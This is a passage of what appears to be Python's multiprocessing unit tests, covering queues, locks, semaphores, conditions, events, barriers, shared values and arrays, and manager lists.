return q.full()
else:
return q.qsize() == maxsize
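# Quick illustration of the two helpers above with a plain multiprocessing
# queue, which provides both empty() and full() so the qsize() fallback is
# not exercised here (illustrative only, mirrors the pattern in test_put):
def _queue_helpers_demo():
    q = multiprocessing.Queue(maxsize=2)
    assert queue_empty(q)
    q.put(1)
    q.put(2)
    assert queue_full(q, 2)   # the bounding semaphore is taken at put() time
    time.sleep(DELTA)         # give the feeder thread time to flush to the pipe
    assert not queue_empty(q)
    q.get()
    q.get()
    close_queue(q)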
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
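        # Poll func() up to ten times (sleeping DELTA between attempts) until
        # it returns the expected value; a NotImplementedError from func()
        # (e.g. get_value() not being available) ends the polling early.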
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
        # Removed temporarily due to API shear: this does not work with
        # threading._Event objects (is_set vs. the legacy isSet name).
        self.assertEqual(event.is_set(), False)
        # Removed: threading.Event.wait() returns the value of the internal
        # flag instead of None, an API difference from the semaphore-backed
        # multiprocessing Event.
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
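        # Return an atomic list-like counter suited to the current flavour:
        # a plain list for threads, a manager list for managers, and the
        # shared-memory backed _DummyList for processes.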
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
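        # Run f in N-1 helper processes/threads (via Bunch) plus the current
        # one, then wait for the helpers to finish.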
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
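        # Each participant appends to the shared counters and waits at the
        # barrier twice per pass; the length assertions only hold if all
        # parties move through the barrier in lockstep.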
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
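        # Pass the barrier `passes` times, reporting each completed pass
        # index to the parent through the shared (locked) pipe connection.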
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
